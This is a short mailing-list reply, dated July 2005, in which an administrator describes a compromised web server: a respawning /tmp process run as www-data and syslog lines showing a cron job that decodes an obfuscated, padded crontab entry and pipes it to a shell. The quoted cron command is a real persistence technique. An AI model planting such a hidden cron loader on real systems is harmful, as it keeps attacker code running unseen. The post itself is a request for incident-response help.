[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: a compromised machine

Thanks for your help. I didn't make much progress though. However, after killing all these processes, a new one was run

www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00 /tmp/dlciiqlno x

that means, that the process was started at 17:31 today. So i checked logs (all virtual servers) and there was nothing under 17:31 except for - - [24/Jul/2005:17:31:39 +0200] "GET / HTTP/1.0" 200 3444 "-" "-"

I didn't make much sense to me, so i checked also syslog and it said

Jul 24 17:31:01 soncek /USR/SBIN/CRON[6050]: (www-data) CMD (/bin/echo `crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|s$
Jul 24 17:31:01 soncek crontab[6054]: (www-data) LIST (www-data)

I killed the process and webserver and at 19:31 the process again started with the same lines in syslog.

What now?


Reply to: